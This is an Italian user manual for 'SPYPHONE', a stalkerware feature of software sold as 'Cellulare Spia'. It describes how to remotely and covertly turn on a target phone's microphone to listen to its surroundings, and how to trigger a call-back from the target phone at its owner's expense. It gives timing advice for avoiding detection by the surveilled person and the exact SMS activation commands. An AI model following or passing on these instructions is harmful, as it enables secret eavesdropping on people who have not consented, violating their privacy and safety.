La funzione spyphone del ns. Software "Cellulare Spia" permette di effettuare l'ascolto ambientale, (attivare il microfono di un cellulare target e ascoltare ciò che si dice nelle sue vicinanze), a distanza illimitata tramite il tuo telefonino.
In seguito il telefono cellulare da controllare sarà chiamato " cellulare target" o "cellulare spia" ed il numero del cellulare da controllare "numero target", mentre il tuo telefono ed il tuo numero di cellulare o fisso saranno indicati come "celluare predifinito" o "numero predefinito".
La nuova versione di SPYPHONE funziona molto diversamente da quella precedente ed è stato migliorato in diversi punti, soprattutto per quanto riguarda la sicurezza. Infatti SPYPHONE, a differenza della vecchia versione, non rimane sempre attivo una volta inviato il comando al celluare target, ma permette di effettuare l'ascolto ambientale una sola volta con ogni singolo comando.
Infatti ogni qual volta il telefono target, (cellulare spia), riceve la richiesta per l'attivazione dell'ascolto ambientale il software spyphone verifica che non si stia operando sul cellulare target e quindi invia una notifica tramite sms al numero target invitandolo a chiamare qualora tutto sia a posto. A livello pratico succede questo:
La nuova funzione SPYPHONE di "richiamata al numero predefinito" funziona in maniera inversa e molto semplice; in questo caso è il telefono target stesso a chiamare il numero predefinito, a livello pratico funziona in questa maniera :
ATTENZIONE : La funzione di Richiamata al numero predefinito, (tuo telefonino), comporta che sia il cellulare target a pagare la chiamata mentre con l'ascolto ambientale classico naturalmente è il chiamante a pagare.
Tempo di Latenza : A chiamata di ascolto ambientale conclusa il software impiega alcuni secondi (5/10 secondi) per riportare il telefono cellulare spia in modalità normale.
E' consigliabile anche non effettuare chiamate di ascolto ambientale molto ravvicinate nel tempo. E' bene infatti attendere 10 minuti da una chiamata di ascolto ambientale all'altro.
Per funzionare il software cellulare spia "SPYPHONE" deve essere attivato tramite dei comandi sms, ogni singola volta ovvero, prima di ogni ascolto ambientale bisogna inviare il comando sms verificando così che il cellulare target sia raggiungibile e non in uso dalla persona che si vuole sorvegliare. Fatto questo è possibile effettuare la chiamata di ascolto ambientale.
Diversamente invece è possibile utilizzare la funzione di richiamata al numero predefinito.
E' possibile effettuare la chiamata di ascolto ambientale da qualsiasi numero telefonico. Infatti quando si invia il comando per l'ascolto ambientale è sufficiente specificarlo nella sintassi dello stesso.
Per quanto riguarda la richiamata al numero predefinito invece il software richiama sempre il numero di telefono dal quale viene inviato il comando.
Ricordiamo che i comandi per il software cellulare spia sono inviabili da qualsiasi telefono l'importante è conoscere la Master Admin Password.
N.B il software per l'ascolto ambientale non può funzionare contemporaneamente a quello di intercettazione (INTERCEPTOR).
ATTIVAZIONE ASCOLTO AMBIENTALE CLASSICO:
#password#205/numeroDiTelefono
ATTIVAZIONE RICHIAMATA (CALL-BACK) A NUMERO PREDEFINITO:
#password#204/secondi